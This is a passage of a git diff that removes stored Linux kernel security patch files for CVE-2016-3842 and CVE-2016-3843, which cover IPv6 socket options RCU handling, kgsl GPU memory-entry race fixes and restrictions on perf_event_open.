-@@ -1098,13 +1102,15 @@ static struct sock *tcp_v6_syn_recv_sock(const struct sock *sk, struct sk_buff *
- 	   but we make one more one thing there: reattach optmem
- 	   to newsk.
- 	 */
--	if (np->opt)
--		newnp->opt = ipv6_dup_options(newsk, np->opt);
--
-+	opt = rcu_dereference(np->opt);
-+	if (opt) {
-+		opt = ipv6_dup_options(newsk, opt);
-+		RCU_INIT_POINTER(newnp->opt, opt);
-+	}
- 	inet_csk(newsk)->icsk_ext_hdr_len = 0;
--	if (newnp->opt)
--		inet_csk(newsk)->icsk_ext_hdr_len = (newnp->opt->opt_nflen +
--						     newnp->opt->opt_flen);
-+	if (opt)
-+		inet_csk(newsk)->icsk_ext_hdr_len = opt->opt_nflen +
-+						    opt->opt_flen;
- 
- 	tcp_ca_openreq_child(newsk, dst);
- 
-diff --git a/net/ipv6/udp.c b/net/ipv6/udp.c
-index 01bcb49..9da3287 100644
---- a/net/ipv6/udp.c
-+++ b/net/ipv6/udp.c
-@@ -1110,6 +1110,7 @@ int udpv6_sendmsg(struct sock *sk, struct msghdr *msg, size_t len)
- 	DECLARE_SOCKADDR(struct sockaddr_in6 *, sin6, msg->msg_name);
- 	struct in6_addr *daddr, *final_p, final;
- 	struct ipv6_txoptions *opt = NULL;
-+	struct ipv6_txoptions *opt_to_free = NULL;
- 	struct ip6_flowlabel *flowlabel = NULL;
- 	struct flowi6 fl6;
- 	struct dst_entry *dst;
-@@ -1263,8 +1264,10 @@ do_udp_sendmsg:
- 			opt = NULL;
- 		connected = 0;
- 	}
--	if (!opt)
--		opt = np->opt;
-+	if (!opt) {
-+		opt = txopt_get(np);
-+		opt_to_free = opt;
-+	}
- 	if (flowlabel)
- 		opt = fl6_merge_options(&opt_space, flowlabel, opt);
- 	opt = ipv6_fixup_options(&opt_space, opt);
-@@ -1373,6 +1376,7 @@ release_dst:
- out:
- 	dst_release(dst);
- 	fl6_sock_release(flowlabel);
-+	txopt_put(opt_to_free);
- 	if (!err)
- 		return len;
- 	/*
-diff --git a/net/l2tp/l2tp_ip6.c b/net/l2tp/l2tp_ip6.c
-index aca38d8..a2c8747 100644
---- a/net/l2tp/l2tp_ip6.c
-+++ b/net/l2tp/l2tp_ip6.c
-@@ -486,6 +486,7 @@ static int l2tp_ip6_sendmsg(struct sock *sk, struct msghdr *msg, size_t len)
- 	DECLARE_SOCKADDR(struct sockaddr_l2tpip6 *, lsa, msg->msg_name);
- 	struct in6_addr *daddr, *final_p, final;
- 	struct ipv6_pinfo *np = inet6_sk(sk);
-+	struct ipv6_txoptions *opt_to_free = NULL;
- 	struct ipv6_txoptions *opt = NULL;
- 	struct ip6_flowlabel *flowlabel = NULL;
- 	struct dst_entry *dst = NULL;
-@@ -575,8 +576,10 @@ static int l2tp_ip6_sendmsg(struct sock *sk, struct msghdr *msg, size_t len)
- 			opt = NULL;
- 	}
- 
--	if (opt == NULL)
--		opt = np->opt;
-+	if (!opt) {
-+		opt = txopt_get(np);
-+		opt_to_free = opt;
-+	}
- 	if (flowlabel)
- 		opt = fl6_merge_options(&opt_space, flowlabel, opt);
- 	opt = ipv6_fixup_options(&opt_space, opt);
-@@ -631,6 +634,7 @@ done:
- 	dst_release(dst);
- out:
- 	fl6_sock_release(flowlabel);
-+	txopt_put(opt_to_free);
- 
- 	return err < 0 ? err : len;
- 
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-3842/3.10/0002.patch b/Patches/Linux_CVEs/CVE-2016-3842/3.10/0002.patch
deleted file mode 100644
index 56181300..00000000
--- a/Patches/Linux_CVEs/CVE-2016-3842/3.10/0002.patch
+++ /dev/null
@@ -1,163 +0,0 @@
-From f5f0a2fe84b589793baa5713ea2aa16779e00d5e Mon Sep 17 00:00:00 2001
-From: Sunil Khatri <sunilkh@codeaurora.org>
-Date: Mon, 13 Jun 2016 15:42:24 -0700
-Subject: [PATCH] msm: kgsl: Defer adding the mem entry to a process
-
-If we add the mem entry pointer in the process idr and rb tree
-too early, other threads can do operations on the entry by
-guessing the ID or GPU address before the object gets returned
-by the creating operation.
-
-Allocate an ID for the object but don't assign the pointer until
-right before the creating function returns ensuring that another
-operation can't access it until it is ready.
-
-Bug: 28026365
-Bug: 28377352
-CRs-Fixed: 1002974
-Change-Id: Ic0dedbadc0dd2125bd2a7bcc152972c0555e07f8
-Signed-off-by: Jordan Crouse <jcrouse@codeaurora.org>
-Signed-off-by: Sunil Khatri <sunilkh@codeaurora.org>
-Signed-off-by: Santhosh Punugu <spunug@codeaurora.org>
----
- drivers/gpu/msm/kgsl.c | 60 ++++++++++++++++++++++++++++++++++++--------------
- 1 file changed, 43 insertions(+), 17 deletions(-)
-
-diff --git a/drivers/gpu/msm/kgsl.c b/drivers/gpu/msm/kgsl.c
-index a1394b6d3d824..f62fe8ad0b857 100644
---- a/drivers/gpu/msm/kgsl.c
-+++ b/drivers/gpu/msm/kgsl.c
-@@ -1,4 +1,4 @@
--/* Copyright (c) 2008-2015, The Linux Foundation. All rights reserved.
-+/* Copyright (c) 2008-2016, The Linux Foundation. All rights reserved.
-  *
-  * This program is free software; you can redistribute it and/or modify
-  * it under the terms of the GNU General Public License version 2 and
-@@ -296,18 +296,13 @@ kgsl_mem_entry_destroy(struct kref *kref)
- EXPORT_SYMBOL(kgsl_mem_entry_destroy);
- 
- /**
-- * kgsl_mem_entry_track_gpuaddr - Insert a mem_entry in the address tree and
-- * assign it with a gpu address space before insertion
-+ * kgsl_mem_entry_track_gpuaddr - Get the entry gpu address space before
-+ * insertion to the process
-  * @process: the process that owns the memory
-  * @entry: the memory entry
-  *
-- * @returns - 0 on succcess else error code
-+ * @returns - 0 on success else error code
-  *
-- * Insert the kgsl_mem_entry in to the rb_tree for searching by GPU address.
-- * The assignment of gpu address and insertion into list needs to
-- * happen with the memory lock held to avoid race conditions between
-- * gpu address being selected and some other thread looking through the
-- * rb list in search of memory based on gpuaddr
-  * This function should be called with processes memory spinlock held
-  */
- static int
-@@ -315,8 +310,6 @@ kgsl_mem_entry_track_gpuaddr(struct kgsl_process_private *process,
- 				struct kgsl_mem_entry *entry)
- {
- 	int ret = 0;
--	struct rb_node **node;
--	struct rb_node *parent = NULL;
- 	struct kgsl_pagetable *pagetable = process->pagetable;
- 
- 	assert_spin_locked(&process->mem_lock);
-@@ -337,11 +330,22 @@ kgsl_mem_entry_track_gpuaddr(struct kgsl_process_private *process,
- 		pagetable = pagetable->mmu->securepagetable;
- 
- 	ret = kgsl_mmu_get_gpuaddr(pagetable, &entry->memdesc);
--	if (ret)
--		goto done;
- 
--	node = &process->mem_rb.rb_node;
-+done:
-+	return ret;
-+}
- 
-+static void kgsl_mem_entry_commit_mem_list(struct kgsl_process_private *process,
-+						struct kgsl_mem_entry *entry)
-+{
-+	struct rb_node **node;
-+	struct rb_node *parent = NULL;
-+
-+	if (!entry->memdesc.gpuaddr)
-+		return;
-+
-+	/* Insert mem entry in mem_rb tree */
-+	node = &process->mem_rb.rb_node;
- 	while (*node) {
- 		struct kgsl_mem_entry *cur;
- 
-@@ -356,9 +360,20 @@ kgsl_mem_entry_track_gpuaddr(struct kgsl_process_private *process,
- 
- 	rb_link_node(&entry->node, parent, node);
- 	rb_insert_color(&entry->node, &process->mem_rb);
-+}
- 
--done:
--	return ret;
-+static void kgsl_mem_entry_commit_process(struct kgsl_process_private *process,
-+						struct kgsl_mem_entry *entry)
-+{
-+	if (!entry)
-+		return;
-+
-+	spin_lock(&entry->priv->mem_lock);
-+	/* Insert mem entry in mem_rb tree */
-+	kgsl_mem_entry_commit_mem_list(process, entry);
-+	/* Replace mem entry in mem_idr using id */
-+	idr_replace(&entry->priv->mem_idr, entry, entry->id);
-+	spin_unlock(&entry->priv->mem_lock);
- }
- 
- /**
-@@ -407,7 +422,8 @@ kgsl_mem_entry_attach_process(struct kgsl_mem_entry *entry,
- 		return -EBADF;
- 	idr_preload(GFP_KERNEL);
- 	spin_lock(&process->mem_lock);
--	id = idr_alloc(&process->mem_idr, entry, 1, 0, GFP_NOWAIT);
-+	/* Allocate the ID but don't attach the pointer just yet */
-+	id = idr_alloc(&process->mem_idr, NULL, 1, 0, GFP_NOWAIT);
- 	spin_unlock(&process->mem_lock);
- 	idr_preload_end();
- 
-@@ -3247,6 +3263,7 @@ long kgsl_ioctl_map_user_mem(struct kgsl_device_private *dev_priv,
- 
- 	trace_kgsl_mem_map(entry, param->fd);
- 
-+	kgsl_mem_entry_commit_process(private, entry);
- 	return result;
- 
- error_attach:
-@@ -3601,6 +3618,8 @@ long kgsl_ioctl_gpumem_alloc(struct kgsl_device_private *dev_priv,
- 	param->gpuaddr = entry->memdesc.gpuaddr;
- 	param->size = entry->memdesc.size;
- 	param->flags = entry->memdesc.flags;
-+
-+	kgsl_mem_entry_commit_process(private, entry);
- 	return result;
- err:
- 	kgsl_sharedmem_free(&entry->memdesc);
-@@ -3646,6 +3665,8 @@ long kgsl_ioctl_gpumem_alloc_id(struct kgsl_device_private *dev_priv,
- 	param->size = entry->memdesc.size;
- 	param->mmapsize = kgsl_memdesc_mmapsize(&entry->memdesc);
- 	param->gpuaddr = entry->memdesc.gpuaddr;
-+
-+	kgsl_mem_entry_commit_process(private, entry);
- 	return result;
- err:
- 	if (entry)
-@@ -4169,6 +4190,11 @@ static int kgsl_check_gpu_addr_collision(
- 			spin_lock(&private->mem_lock);
- 			kgsl_mem_entry_untrack_gpuaddr(private, entry);
- 			spin_unlock(&private->mem_lock);
-+		} else {
-+			/* Insert mem entry in mem_rb tree */
-+			spin_lock(&private->mem_lock);
-+			kgsl_mem_entry_commit_mem_list(private, entry);
-+			spin_unlock(&private->mem_lock);
- 		}
- 	} else {
- 		trace_kgsl_mem_unmapped_area_collision(entry, addr, len,
diff --git a/Patches/Linux_CVEs/CVE-2016-3842/3.18/0003.patch b/Patches/Linux_CVEs/CVE-2016-3842/3.18/0003.patch
deleted file mode 100644
index b1ed3898..00000000
--- a/Patches/Linux_CVEs/CVE-2016-3842/3.18/0003.patch
+++ /dev/null
@@ -1,77 +0,0 @@
-From 905de01dda0bc6663f8ce5c8f0f3831dae49bb36 Mon Sep 17 00:00:00 2001
-From: Jordan Crouse <jcrouse@codeaurora.org>
-Date: Tue, 3 May 2016 14:11:03 -0600
-Subject: [PATCH] msm: kgsl: Defer adding the mem entry to a process
-
-If we add the mem entry pointer in the process mem_idr too early
-other threads can do operations on the entry by guessing the ID
-or GPU address before the object gets returned by the creating
-operation.
-
-Allocate an ID for the object but don't assign the pointer until
-right before the creating function returns ensuring that another
-operation can't access it until it is ready.
-
-CRs-Fixed: 1002974
-Change-Id: Ic0dedbadc0dd2125bd2a7bcc152972c0555e07f8
-Signed-off-by: Jordan Crouse <jcrouse@codeaurora.org>
----
- drivers/gpu/msm/kgsl.c | 17 ++++++++++++++++-
- 1 file changed, 16 insertions(+), 1 deletion(-)
-
-diff --git a/drivers/gpu/msm/kgsl.c b/drivers/gpu/msm/kgsl.c
-index 51dc781b2bd47..2563591f376e2 100644
---- a/drivers/gpu/msm/kgsl.c
-+++ b/drivers/gpu/msm/kgsl.c
-@@ -388,6 +388,17 @@ kgsl_mem_entry_untrack_gpuaddr(struct kgsl_process_private *process,
- 		kgsl_mmu_put_gpuaddr(pagetable, &entry->memdesc);
- }
- 
-+/* Commit the entry to the process so it can be accessed by other operations */
-+static void kgsl_mem_entry_commit_process(struct kgsl_mem_entry *entry)
-+{
-+	if (!entry)
-+		return;
-+
-+	spin_lock(&entry->priv->mem_lock);
-+	idr_replace(&entry->priv->mem_idr, entry, entry->id);
-+	spin_unlock(&entry->priv->mem_lock);
-+}
-+
- /**
-  * kgsl_mem_entry_attach_process - Attach a mem_entry to its owner process
-  * @entry: the memory entry
-@@ -418,7 +429,8 @@ kgsl_mem_entry_attach_process(struct kgsl_mem_entry *entry,
- 
- 	idr_preload(GFP_KERNEL);
- 	spin_lock(&process->mem_lock);
--	id = idr_alloc(&process->mem_idr, entry, 1, 0, GFP_NOWAIT);
-+	/* Allocate the ID but don't attach the pointer just yet */
-+	id = idr_alloc(&process->mem_idr, NULL, 1, 0, GFP_NOWAIT);
- 	spin_unlock(&process->mem_lock);
- 	idr_preload_end();
- 
-@@ -2317,6 +2329,7 @@ long kgsl_ioctl_gpuobj_import(struct kgsl_device_private *dev_priv,
- 
- 	trace_kgsl_mem_map(entry, fd);
- 
-+	kgsl_mem_entry_commit_process(entry);
- 	return 0;
- 
- unmap:
-@@ -2580,6 +2593,7 @@ long kgsl_ioctl_map_user_mem(struct kgsl_device_private *dev_priv,
- 
- 	trace_kgsl_mem_map(entry, param->fd);
- 
-+	kgsl_mem_entry_commit_process(entry);
- 	return result;
- 
- error_attach:
-@@ -2971,6 +2985,7 @@ static struct kgsl_mem_entry *gpumem_alloc_entry(
- 			entry->memdesc.size);
- 	trace_kgsl_mem_alloc(entry);
- 
-+	kgsl_mem_entry_commit_process(entry);
- 	return entry;
- err:
- 	kfree(entry);
diff --git a/Patches/Linux_CVEs/CVE-2016-3842/3.4/0001.patch b/Patches/Linux_CVEs/CVE-2016-3842/3.4/0001.patch
deleted file mode 100644
index 53de44d3..00000000
--- a/Patches/Linux_CVEs/CVE-2016-3842/3.4/0001.patch
+++ /dev/null
@@ -1,208 +0,0 @@
-From 15701ca335357e98a0eb98ef079fe45e3b830591 Mon Sep 17 00:00:00 2001
-From: Sunil Khatri <sunilkh@codeaurora.org>
-Date: Mon, 13 Jun 2016 15:45:19 -0700
-Subject: [PATCH] msm: kgsl: Defer adding the mem entry to a process
-
-If we add the mem entry pointer in the process idr and rb tree
-too early, other threads can do operations on the entry by
-guessing the ID or GPU address before the object gets returned
-by the creating operation.
-
-Allocate an ID for the object but don't assign the pointer until
-right before the creating function returns ensuring that another
-operation can't access it until it is ready.
-
-Bug: 28026365
-CRs-Fixed: 1002974
-Change-Id: Ic0dedbadc0dd2125bd2a7bcc152972c0555e07f8
-Signed-off-by: Jordan Crouse <jcrouse@codeaurora.org>
-Signed-off-by: Sunil Khatri <sunilkh@codeaurora.org>
-Signed-off-by: Santhosh Punugu <spunug@codeaurora.org>
----
- drivers/gpu/msm/kgsl.c | 103 +++++++++++++++++++++++++++++++------------------
- 1 file changed, 65 insertions(+), 38 deletions(-)
-
-diff --git a/drivers/gpu/msm/kgsl.c b/drivers/gpu/msm/kgsl.c
-index a4986a75b6260..31a403a939242 100644
---- a/drivers/gpu/msm/kgsl.c
-+++ b/drivers/gpu/msm/kgsl.c
-@@ -1,4 +1,4 @@
--/* Copyright (c) 2008-2013, The Linux Foundation. All rights reserved.
-+/* Copyright (c) 2008-2013,2016, The Linux Foundation. All rights reserved.
-  *
-  * This program is free software; you can redistribute it and/or modify
-  * it under the terms of the GNU General Public License version 2 and
-@@ -246,18 +246,13 @@ kgsl_mem_entry_destroy(struct kref *kref)
- EXPORT_SYMBOL(kgsl_mem_entry_destroy);
- 
- /**
-- * kgsl_mem_entry_track_gpuaddr - Insert a mem_entry in the address tree and
-- * assign it with a gpu address space before insertion
-+ * kgsl_mem_entry_track_gpuaddr - Get the entry gpu address space before
-+ * insertion to the process
-  * @process: the process that owns the memory
-  * @entry: the memory entry
-  *
-- * @returns - 0 on succcess else error code
-+ * @returns - 0 on success else error code
-  *
-- * Insert the kgsl_mem_entry in to the rb_tree for searching by GPU address.
-- * The assignment of gpu address and insertion into list needs to
-- * happen with the memory lock held to avoid race conditions between
-- * gpu address being selected and some other thread looking through the
-- * rb list in search of memory based on gpuaddr
-  * This function should be called with processes memory spinlock held
-  */
- static int
-@@ -265,8 +260,6 @@ kgsl_mem_entry_track_gpuaddr(struct kgsl_process_private *process,
- 				struct kgsl_mem_entry *entry)
- {
- 	int ret = 0;
--	struct rb_node **node;
--	struct rb_node *parent = NULL;
- 
- 	assert_spin_locked(&process->mem_lock);
- 	/*
-@@ -274,36 +267,17 @@ kgsl_mem_entry_track_gpuaddr(struct kgsl_process_private *process,
- 	 * gpu address
- 	 */
- 	if (kgsl_memdesc_use_cpu_map(&entry->memdesc)) {
--		if (!entry->memdesc.gpuaddr)
--			goto done;
--	} else if (entry->memdesc.gpuaddr) {
--		WARN_ONCE(1, "gpuaddr assigned w/o holding memory lock\n");
--		ret = -EINVAL;
--		goto done;
--	}
--	if (!kgsl_memdesc_use_cpu_map(&entry->memdesc)) {
--		ret = kgsl_mmu_get_gpuaddr(process->pagetable, &entry->memdesc);
--		if (ret)
-+		/* cpu map flag is enabled. do nothing */
-+	} else {
-+		if (entry->memdesc.gpuaddr) {
-+			WARN_ONCE(1, "gpuaddr assigned w/o holding memory lock\n");
-+			ret = -EINVAL;
- 			goto done;
--	}
--
--	node = &process->mem_rb.rb_node;
--
--	while (*node) {
--		struct kgsl_mem_entry *cur;
--
--		parent = *node;
--		cur = rb_entry(parent, struct kgsl_mem_entry, node);
-+		}
- 
--		if (entry->memdesc.gpuaddr < cur->memdesc.gpuaddr)
--			node = &parent->rb_left;
--		else
--			node = &parent->rb_right;
-+		ret = kgsl_mmu_get_gpuaddr(process->pagetable, &entry->memdesc);
- 	}
- 
--	rb_link_node(&entry->node, parent, node);
--	rb_insert_color(&entry->node, &process->mem_rb);
--
- done:
- 	return ret;
- }
-@@ -327,6 +301,47 @@ kgsl_mem_entry_untrack_gpuaddr(struct kgsl_process_private *process,
- 	}
- }
- 
-+static void kgsl_mem_entry_commit_mem_list(struct kgsl_process_private *process,
-+				struct kgsl_mem_entry *entry)
-+{
-+	struct rb_node **node;
-+	struct rb_node *parent = NULL;
-+
-+	if (!entry->memdesc.gpuaddr)
-+		return;
-+
-+	/* Insert mem entry in mem_rb tree */
-+	node = &process->mem_rb.rb_node;
-+	while (*node) {
-+		struct kgsl_mem_entry *cur;
-+
-+		parent = *node;
-+		cur = rb_entry(parent, struct kgsl_mem_entry, node);
-+
-+		if (entry->memdesc.gpuaddr < cur->memdesc.gpuaddr)
-+			node = &parent->rb_left;
-+		else
-+			node = &parent->rb_right;
-+	}
-+
-+	rb_link_node(&entry->node, parent, node);
-+	rb_insert_color(&entry->node, &process->mem_rb);
-+}
-+
-+static void kgsl_mem_entry_commit_process(struct kgsl_process_private *process,
-+				struct kgsl_mem_entry *entry)
-+{
-+	if (!entry)
-+		return;
-+
-+	spin_lock(&entry->priv->mem_lock);
-+	/* Insert mem entry in mem_rb tree */
-+	kgsl_mem_entry_commit_mem_list(process, entry);
-+	/* Replace mem entry in mem_idr using id */
-+	idr_replace(&entry->priv->mem_idr, entry, entry->id);
-+	spin_unlock(&entry->priv->mem_lock);
-+}
-+
- /**
-  * kgsl_mem_entry_attach_process - Attach a mem_entry to its owner process
-  * @entry: the memory entry
-@@ -357,9 +372,11 @@ kgsl_mem_entry_attach_process(struct kgsl_mem_entry *entry,
- 		}
- 
- 		spin_lock(&process->mem_lock);
--		ret = idr_get_new_above(&process->mem_idr, entry, 1,
-+		/* Allocate the ID but don't attach the pointer just yet */
-+		ret = idr_get_new_above(&process->mem_idr, NULL, 1,
- 					&entry->id);
- 		spin_unlock(&process->mem_lock);
-+
- 		if (ret == 0)
- 			break;
- 		else if (ret != -EAGAIN)
-@@ -2894,6 +2911,7 @@ static long kgsl_ioctl_map_user_mem(struct kgsl_device_private *dev_priv,
- 
- 	trace_kgsl_mem_map(entry, param->fd);
- 
-+	kgsl_mem_entry_commit_process(private, entry);
- 	return result;
- 
- error_attach:
-@@ -3181,6 +3199,8 @@ kgsl_ioctl_gpumem_alloc(struct kgsl_device_private *dev_priv,
- 	param->gpuaddr = entry->memdesc.gpuaddr;
- 	param->size = entry->memdesc.size;
- 	param->flags = entry->memdesc.flags;
-+
-+	kgsl_mem_entry_commit_process(private, entry);
- 	return result;
- err:
- 	kgsl_sharedmem_free(&entry->memdesc);
-@@ -3217,6 +3237,8 @@ kgsl_ioctl_gpumem_alloc_id(struct kgsl_device_private *dev_priv,
- 	param->size = entry->memdesc.size;
- 	param->mmapsize = kgsl_memdesc_mmapsize(&entry->memdesc);
- 	param->gpuaddr = entry->memdesc.gpuaddr;
-+
-+	kgsl_mem_entry_commit_process(private, entry);
- 	return result;
- err:
- 	if (entry)
-@@ -3804,6 +3826,11 @@ kgsl_get_unmapped_area(struct file *file, unsigned long addr,
- 				kgsl_mem_entry_untrack_gpuaddr(private, entry);
- 				spin_unlock(&private->mem_lock);
- 				ret = ret_val;
-+			} else {
-+				/* Insert mem entry in mem_rb tree */
-+				spin_lock(&private->mem_lock);
-+				kgsl_mem_entry_commit_mem_list(private, entry);
-+				spin_unlock(&private->mem_lock);
- 			}
- 			break;
- 		}
diff --git a/Patches/Linux_CVEs/CVE-2016-3843/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-3843/ANY/0001.patch
deleted file mode 100644
index 5f8608b5..00000000
--- a/Patches/Linux_CVEs/CVE-2016-3843/ANY/0001.patch
+++ /dev/null
@@ -1,132 +0,0 @@
-From e65cc8f9c46c6b8119826fbc22ffeb4e96e80e8a Mon Sep 17 00:00:00 2001
-From: Ben Hutchings <ben@decadent.org.uk>
-Date: Tue, 19 Jan 2016 21:35:15 +0000
-Subject: BACKPORT: perf tools: Document the perf sysctls
-
-perf_event_paranoid was only documented in source code and a perf error
-message.  Copy the documentation from the error message to
-Documentation/sysctl/kernel.txt.
-
-Conflicts:
-	Documentation/sysctl/kernel.txt
-	tools/perf/util/evsel.c
-
-Signed-off-by: Ben Hutchings <ben@decadent.org.uk>
-Cc: Peter Zijlstra <peterz@infradead.org>
-Cc: linux-doc@vger.kernel.org
-Link: http://lkml.kernel.org/r/20160119213515.GG2637@decadent.org.uk
-[ Remove reference to external Documentation file, provide info inline, as before ]
-Signed-off-by: Arnaldo Carvalho de Melo <acme@redhat.com>
-Bug: 29054680
-Bug: 29119870
-Signed-off-by: Dennis Cagle <d-cagle@codeaurora.org>
-Change-Id: I13e73cfb2ad761c94762d0c8196df7725abdf5c5
-(cherry picked from commit 746938f9d97d74f6c2833a0ede49506bdfcd89e4)
----
- Documentation/sysctl/kernel.txt | 41 ++++++++++++++++++++++++++---------------
- tools/perf/util/evsel.c         | 15 +++++++++------
- 2 files changed, 35 insertions(+), 21 deletions(-)
-
-diff --git a/Documentation/sysctl/kernel.txt b/Documentation/sysctl/kernel.txt
-index 550ece7..942d769 100644
---- a/Documentation/sysctl/kernel.txt
-+++ b/Documentation/sysctl/kernel.txt
-@@ -51,8 +51,9 @@ show up in /proc/sys/kernel:
- - overflowuid
- - panic
- - panic_on_oops
--- panic_on_unrecovered_nmi
- - panic_on_stackoverflow
-+- panic_on_unrecovered_nmi
-+- perf_event_paranoid
- - pid_max
- - powersave-nap               [ PPC only ]
- - printk
-@@ -427,19 +428,6 @@ the recommended setting is 60.
- 
- ==============================================================
- 
--panic_on_unrecovered_nmi:
--
--The default Linux behaviour on an NMI of either memory or unknown is
--to continue operation. For many environments such as scientific
--computing it is preferable that the box is taken out and the error
--dealt with than an uncorrected parity/ECC error get propagated.
--
--A small number of systems do generate NMI's for bizarre random reasons
--such as power management so the default is off. That sysctl works like
--the existing panic controls already in that directory.
--
--==============================================================
--
- panic_on_oops:
- 
- Controls the kernel's behaviour when an oops or BUG is encountered.
-@@ -459,7 +447,6 @@ This file shows up if CONFIG_DEBUG_STACKOVERFLOW is enabled.
- 
- 0: try to continue operation.
- 
--1: panic immediately.
- 
- ==============================================================
- 
-@@ -489,6 +476,30 @@ allowed to execute.
- 
- ==============================================================
- 
-+panic_on_unrecovered_nmi:
-+
-+The default Linux behaviour on an NMI of either memory or unknown is
-+to continue operation. For many environments such as scientific
-+computing it is preferable that the box is taken out and the error
-+dealt with than an uncorrected parity/ECC error get propagated.
-+
-+A small number of systems do generate NMI's for bizarre random reasons
-+such as power management so the default is off. That sysctl works like
-+the existing panic controls already in that directory.
-+
-+==============================================================
-+
-+perf_event_paranoid:
-+
-+Controls use of the performance events system by unprivileged
-+users (without CAP_SYS_ADMIN).  The default value is 1.
-+
-+ -1: Allow use of (almost) all events by all users
-+>=0: Disallow raw tracepoint access by users without CAP_IOC_LOCK
-+>=1: Disallow CPU event access by users without CAP_SYS_ADMIN
-+>=2: Disallow kernel profiling by users without CAP_SYS_ADMIN
-+
-+==============================================================
- 
- pid_max:
- 
-diff --git a/tools/perf/util/evsel.c b/tools/perf/util/evsel.c
-index 63b6f8c..54494df 100644
---- a/tools/perf/util/evsel.c
-+++ b/tools/perf/util/evsel.c
-@@ -1515,12 +1515,15 @@ int perf_evsel__open_strerror(struct perf_evsel *evsel,
- 	case EPERM:
- 	case EACCES:
- 		return scnprintf(msg, size,
--		 "You may not have permission to collect %sstats.\n"
--		 "Consider tweaking /proc/sys/kernel/perf_event_paranoid:\n"
--		 " -1 - Not paranoid at all\n"
--		 "  0 - Disallow raw tracepoint access for unpriv\n"
--		 "  1 - Disallow cpu events for unpriv\n"
--		 "  2 - Disallow kernel profiling for unpriv",
-+		 "You may not have permission to collect %sstats.\n\n"
-+		 "Consider tweaking /proc/sys/kernel/perf_event_paranoid,\n"
-+		 "which controls use of the performance events system by\n"
-+		 "unprivileged users (without CAP_SYS_ADMIN).\n\n"
-+		 "The default value is 1:\n\n"
-+		 "  -1: Allow use of (almost) all events by all users\n"
-+		 ">= 0: Disallow raw tracepoint access by users without CAP_IOC_LOCK\n"
-+		 ">= 1: Disallow CPU event access by users without CAP_SYS_ADMIN\n"
-+		 ">= 2: Disallow kernel profiling by users without CAP_SYS_ADMIN",
- 				 target->system_wide ? "system-wide " : "");
- 	case ENOENT:
- 		return scnprintf(msg, size, "The %s event is not supported.",
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-3843/ANY/0002.patch b/Patches/Linux_CVEs/CVE-2016-3843/ANY/0002.patch
deleted file mode 100644
index b12531f6..00000000
--- a/Patches/Linux_CVEs/CVE-2016-3843/ANY/0002.patch
+++ /dev/null
@@ -1,119 +0,0 @@
-From 149cf87192059fab0cb49ec5c691783c3565c215 Mon Sep 17 00:00:00 2001
-From: Jeff Vander Stoep <jeffv@google.com>
-Date: Sun, 29 May 2016 14:22:32 -0700
-Subject: FROMLIST: security,perf: Allow further restriction of perf_event_open
-
-When kernel.perf_event_open is set to 3 (or greater), disallow all
-access to performance events by users without CAP_SYS_ADMIN.
-Add a Kconfig symbol CONFIG_SECURITY_PERF_EVENTS_RESTRICT that
-makes this value the default.
-
-This is based on a similar feature in grsecurity
-(CONFIG_GRKERNSEC_PERF_HARDEN).  This version doesn't include making
-the variable read-only.  It also allows enabling further restriction
-at run-time regardless of whether the default is changed.
-
-https://lkml.org/lkml/2016/1/11/587
-
-Conflicts:
-	kernel/events/core.c
-
-Signed-off-by: Ben Hutchings <ben@decadent.org.uk>
-Signed-off-by: Dennis Cagle <d-cagle@codeaurora.org>
-Bug: 29054680
-Bug: 29119870
-Change-Id: Iff5bff4fc1042e85866df9faa01bce8d04335ab8
-(cherry picked from commit f16929ac8586f37949c638c738a6f0de969ed1ea)
----
- Documentation/sysctl/kernel.txt | 4 +++-
- include/linux/perf_event.h      | 5 +++++
- kernel/events/core.c            | 6 ++++++
- security/Kconfig                | 9 +++++++++
- 4 files changed, 23 insertions(+), 1 deletion(-)
-
-diff --git a/Documentation/sysctl/kernel.txt b/Documentation/sysctl/kernel.txt
-index 942d769..d438fd2 100644
---- a/Documentation/sysctl/kernel.txt
-+++ b/Documentation/sysctl/kernel.txt
-@@ -492,12 +492,14 @@ the existing panic controls already in that directory.
- perf_event_paranoid:
- 
- Controls use of the performance events system by unprivileged
--users (without CAP_SYS_ADMIN).  The default value is 1.
-+users (without CAP_SYS_ADMIN).  The default value is 3 if
-+CONFIG_SECURITY_PERF_EVENTS_RESTRICT is set, or 1 otherwise.
- 
-  -1: Allow use of (almost) all events by all users
- >=0: Disallow raw tracepoint access by users without CAP_IOC_LOCK
- >=1: Disallow CPU event access by users without CAP_SYS_ADMIN
- >=2: Disallow kernel profiling by users without CAP_SYS_ADMIN
-+>=3: Disallow all event access by users without CAP_SYS_ADMIN
- 
- ==============================================================
- 
-diff --git a/include/linux/perf_event.h b/include/linux/perf_event.h
-index 4410efa..86b43c1 100644
---- a/include/linux/perf_event.h
-+++ b/include/linux/perf_event.h
-@@ -715,6 +715,11 @@ extern int perf_cpu_time_max_percent_handler(struct ctl_table *table, int write,
- 		loff_t *ppos);
- 
- 
-+static inline bool perf_paranoid_any(void)
-+{
-+	return sysctl_perf_event_paranoid > 2;
-+}
-+
- static inline bool perf_paranoid_tracepoint_raw(void)
- {
- 	return sysctl_perf_event_paranoid > -1;
-diff --git a/kernel/events/core.c b/kernel/events/core.c
-index 7ab36de..e8cae75 100644
---- a/kernel/events/core.c
-+++ b/kernel/events/core.c
-@@ -166,9 +166,12 @@ static struct srcu_struct pmus_srcu;
-  *   0 - disallow raw tracepoint access for unpriv
-  *   1 - disallow cpu events for unpriv
-  *   2 - disallow kernel profiling for unpriv
-+ *   3 - disallow all unpriv perf event use
-  */
- #ifdef CONFIG_PERF_EVENTS_USERMODE
- int sysctl_perf_event_paranoid __read_mostly = -1;
-+#elif defined CONFIG_SECURITY_PERF_EVENTS_RESTRICT
-+int sysctl_perf_event_paranoid __read_mostly = 3;
- #else
- int sysctl_perf_event_paranoid __read_mostly = 1;
- #endif
-@@ -6826,6 +6829,9 @@ SYSCALL_DEFINE5(perf_event_open,
- 	if (flags & ~PERF_FLAG_ALL)
- 		return -EINVAL;
- 
-+	if (perf_paranoid_any() && !capable(CAP_SYS_ADMIN))
-+		return -EACCES;
-+
- 	err = perf_copy_attr(attr_uptr, &attr);
- 	if (err)
- 		return err;
-diff --git a/security/Kconfig b/security/Kconfig
-index 0114543..66a5f80 100644
---- a/security/Kconfig
-+++ b/security/Kconfig
